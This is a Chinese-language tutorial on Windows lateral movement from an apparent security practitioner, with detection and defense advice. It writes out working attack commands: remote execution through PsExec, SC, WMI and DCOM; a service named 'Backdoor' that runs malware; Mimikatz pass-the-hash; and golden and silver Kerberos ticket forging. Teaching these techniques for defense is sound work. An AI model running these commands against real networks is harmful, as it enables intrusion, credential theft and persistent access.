内网横向移动技术：攻击原理与防御实践

1. 内网横向移动技术全景解析

作为一名长期从事企业安全防护的从业者，我见证了内网横向移动技术从简单到复杂的演变过程。横向移动（Lateral Movement）是攻击者在攻陷内网某台主机后，以此为跳板向其他主机渗透的关键技术手段。这种攻击方式之所以危险，是因为它能够绕过传统边界防护，直接在内网中扩散。

1.1 横向移动的核心价值

在内网渗透测试中，横向移动技术具有三个不可替代的价值：

1. 权限提升：从普通用户权限逐步获取域管理员等高权限
2. 信息收集：通过多台主机获取更全面的网络拓扑和敏感数据
3. 持久化：在多个系统建立据点，提高攻击的冗余性

重要提示：所有技术讨论仅限授权测试使用，未经授权的测试可能违反相关法律法规。

2. 横向移动技术体系详解

2.1 基于服务的横向移动技术

2.1.1 PsExec技术解析

PsExec是Sysinternals套件中的合法工具，但常被攻击者滥用。其工作原理可分为四个阶段：

1. 连接建立：通过IPC$共享建立与管理共享（admin$）的连接
2. 文件传输：将PsExecSvc.exe上传至目标系统%SystemRoot%目录
3. 服务创建：通过SCM创建并启动PsExec服务
4. 命令执行：服务启动指定程序并返回执行结果

典型利用命令示例：

bash复制PsExec64.exe -accepteula \\192.168.1.100 -u DOMAIN\user -p password -s cmd.exe

防御检测要点：

• 监控服务创建事件（Event ID 7045）
• 检查异常服务名称（特别是随机命名的服务）
• 分析网络流量中的SMB协议特征

2.1.2 SC命令利用

Windows服务控制管理器(SC)提供了命令行接口，攻击者常用来创建恶意服务：

bash复制sc \\TARGET create Backdoor binpath= "cmd.exe /c C:\malware.exe"
sc \\TARGET start Backdoor

操作注意事项：

1. 需要提前建立IPC$连接
2. 二进制文件需提前上传至目标
3. 清理阶段务必删除创建的服务

2.2 WMI技术深度利用

Windows Management Instrumentation(WMI)提供了更隐蔽的远程执行方式，其优势在于：

• 默认不记录操作日志
• 使用135端口（DCOM）或5985/5986端口（WinRM）
• 支持无文件攻击方式

2.2.1 基础WMI命令

进程信息查询：

bash复制wmic /node:192.168.1.100 /user:admin /password:123 process list brief

远程进程创建：

bash复制wmic /node:192.168.1.100 /user:admin /password:123 process call create "cmd.exe /c ipconfig > C:\result.txt"

2.2.2 高级WMI工具

Impacket工具集中的wmiexec.py提供了更强大的功能：

python复制python wmiexec.py -hashes LMHASH:NTHASH domain/user@target

实战技巧：

• 使用-persist参数避免进程卡死
• 结合-codec参数处理中文输出
• 通过-debug参数排查连接问题

2.3 DCOM技术滥用

分布式组件对象模型(DCOM)允许跨网络调用COM对象，攻击者常利用以下COM组件：

2.3.1 MMC20.Application

powershell复制$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.100"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","Minimized")

2.3.2 Excel.Application

powershell复制$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","192.168.1.100"))
$excel.DDEInitiate("cmd.exe", "/c calc.exe")

防御建议：

• 禁用不必要的COM组件
• 配置DCOM权限限制
• 监控DCOM激活事件

3. 凭证攻击技术详解

3.1 Pass-the-Hash(PtH)攻击

3.1.1 技术原理

PtH攻击利用NTLM认证机制的特点：

1. 不需要明文密码
2. 直接使用哈希值进行认证
3. 适用于SMB、RDP等多种协议

Mimikatz实现：

bash复制sekurlsa::pth /user:Administrator /domain:CONTOSO /ntlm:329153f560eb329c0e1deea55e88a1e9

3.1.2 防御措施

• 启用Credential Guard
• 限制本地管理员权限
• 使用LSA保护策略
• 监控异常登录事件

3.2 Pass-the-Ticket(PtT)攻击

3.2.1 黄金票据(Golden Ticket)

生成条件：

• 域SID
• krbtgt账户哈希
• 域名
• 要伪造的用户名

生成命令：

bash复制kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:hash /ticket:gold.kirbi

3.2.2 白银票据(Silver Ticket)

针对特定服务的伪造：

bash复制kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-123456789-1234567890-123456789 /target:server.contoso.com /service:HTTP /rc4:hash /ticket:silver.kirbi

检测方法：

• 监控Kerberos TGS请求
• 分析票据生存时间
• 检查票据中的PAC信息

4. 防御体系建设方案

4.1 基础防护措施

1. 密码安全：

   • 实施强密码策略
   • 定期更换特权账户密码
   • 禁用NTLMv1协议

2. 权限控制：

   • 遵循最小权限原则
   • 限制本地管理员权限
   • 实施特权访问管理

3. 系统加固：

   • 及时安装安全补丁
   • 关闭不必要的服务和端口
   • 启用Windows Defender ATP

4.2 高级检测技术

1. 行为分析：

   • 监控异常服务创建
   • 检测横向移动模式
   • 分析网络流量特征

2. 日志审计：

   • 集中收集安全日志
   • 配置关键事件警报
   • 定期进行日志分析

3. 网络分段：

   • 实施微隔离
   • 限制域控制器访问
   • 划分安全区域

5. 实战案例与经验分享

在一次红队评估中，我们通过以下路径完成了内网横向移动：

1. 初始立足点：通过钓鱼邮件获取普通域用户权限
2. 信息收集：使用BloodHound分析域内关系
3. 权限提升：利用MS14-068漏洞获取域管理员权限
4. 横向移动：
   • 通过WMI批量执行命令
   • 使用黄金票据保持持久访问
   • 通过DCOM在关键服务器部署后门

关键教训：

• 域内密码重用是最大风险
• Kerberos日志往往被忽视
• 网络分段不彻底导致攻击扩散

6. 工具与资源推荐

6.1 常用工具列表

6.2 学习资源

1. 微软安全文档：

   • "Mitigating Pass-the-Hash Attacks"
   • "Detecting Lateral Movement in Windows Infrastructure"

2. 行业标准：

   • MITRE ATT&CK框架
   • NIST网络安全框架

3. 实践环境：

   • Hack The Box企业靶场
   • TryHackMe内网模块

在实际防御工作中，我建议采用"假设已被入侵"的思维，重点监控特权账户活动，建立完善的日志审计机制，并定期进行红蓝对抗演练。只有真正理解攻击者的技术手段，才能构建有效的防御体系。